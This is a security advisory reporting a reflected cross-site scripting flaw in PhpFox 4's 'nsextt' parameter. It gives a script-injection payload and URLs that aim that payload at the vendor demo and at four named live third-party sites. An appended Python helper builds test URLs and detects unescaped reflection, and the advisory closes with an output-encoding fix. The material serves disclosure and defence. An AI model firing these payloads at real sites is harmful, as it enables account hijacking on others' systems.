PHPFox 4 Cross Site Scripting

2016-06-09T00:00:00
ID PACKETSTORM:137388
Type packetstorm
Reporter bl4ck_MohajeM
Modified 2016-06-09T00:00:00

Description

###########################################  
# Title : PhpFox4 Cross Site Scripting Vuln.  
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)  
# Software Link: http://www.phpfox.com/  
# Version: 4  
# Date : 06/09/2016  
# Category: WebApps  
# Tested with : Ubuntu / Win  
###########################################  
[Description]  
  
This CMS has a reflected Cross Site Scripting vulnerability in the  
'nsextt' parameter.  
PhpFox takes the value of this parameter from the client and writes it  
back into the page without passing it through any anti-XSS (output  
encoding) function.  
Vuln. Input ==> /?nsextt=  
  
###########################################  
[Proof of Concept]  
  
Replace '/?nsextt=' in the vulnerable URL with the following:  
/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
The page then pops an alert containing '209' (0x0000D1 in decimal).  
  
###########################################  
[Example]  
  
https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E  
https://v4.phpfox.com/blog/  
https://v4.phpfox.com/photo/  
https://v4.phpfox.com/forum/  
https://v4.phpfox.com/poll/  
https://v4.phpfox.com/quiz/  
https://v4.phpfox.com/event/  
https://v4.phpfox.com/music/  
https://v4.phpfox.com/marketplace/  
https://v4.phpfox.com/pages/  
https://v4.phpfox.com/invite/  
  
Demo (live third-party sites):  
tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
  
  
###########################################  
[Solution]  
  
The programmer should HTML-encode data received from clients before writing  
it into the page (in PHP, htmlspecialchars() with ENT_QUOTES), encoding at  
output time for the context the value lands in.  
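The reflection described in the [Description] and [Proof of Concept] sections and the encoding fix called for in [Solution], as an added Python example that is not part of this advisory and is not phpFox's own code. The two render_* functions are a constructed stand-in for the template (the real reflection point in phpFox is not shown on this page); the checker is written to be run over the body of a real HTTP response to one of the URLs listed above.

```python
import html
from urllib.parse import quote

# Payload taken verbatim from the advisory. The leading ' and " close an attribute,
# --> closes an HTML comment, </style> and </scRipt> close those blocks, and the
# mixed-case <scRipt> tag dodges naive lowercase-only filters. 0x0000D1 == 209.
PAYLOAD = "'\"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>"


def encoded_payload() -> str:
    """URL-encode the payload exactly as the advisory's example URL does
    (slashes and parentheses left bare, everything else percent-encoded)."""
    return quote(PAYLOAD, safe="/()")


def poc_url(base: str, path: str) -> str:
    """Build the test URL for one of the listed module paths, e.g. '/blog/'."""
    return f"{base}{path}?nsextt={encoded_payload()}"


def render_vulnerable(nsextt: str) -> str:
    """Constructed stand-in for the vulnerable pattern (hypothetical template,
    not phpFox's): the raw query value is concatenated into markup unencoded."""
    return f'<input type="hidden" name="nsextt" value="{nsextt}">'


def render_fixed(nsextt: str) -> str:
    """Same hypothetical template with the fix the advisory calls for: HTML-entity
    encode the value, quotes included. html.escape(quote=True) is the Python
    equivalent of PHP's htmlspecialchars($v, ENT_QUOTES, 'UTF-8')."""
    return f'<input type="hidden" name="nsextt" value="{html.escape(nsextt, quote=True)}">'


def reflects_unescaped(body: str, payload: str = PAYLOAD) -> bool:
    """Check a response body: True when the payload came back verbatim, i.e. a
    <scRipt> tag was written into the page rather than entity-encoded. Matching
    is case-insensitive so the mixed-case tag is caught too."""
    lowered = body.lower()
    return payload.lower() in lowered and "<script>" in lowered


if __name__ == "__main__":
    # Offline demonstration on the two constructed responses.
    for label, body in (("vulnerable", render_vulnerable(PAYLOAD)),
                        ("fixed", render_fixed(PAYLOAD))):
        print(f"{label:10s} reflected unescaped: {reflects_unescaped(body)}")
        print("  ", body)
    print(poc_url("https://v4.phpfox.com", "/v/category/69/comedy/"))
```

To test a live instance, fetch poc_url(base, path) for each module path listed under [Example] and pass the response text to reflects_unescaped(); a True result means the parameter is still reflected raw. The hardened rendering keeps the payload as visible text (&lt;scRipt&gt;...) and never yields a tag.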
###########################################  
Thanks: sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD -  
shabgard - b3hz4d  
  
###########################################  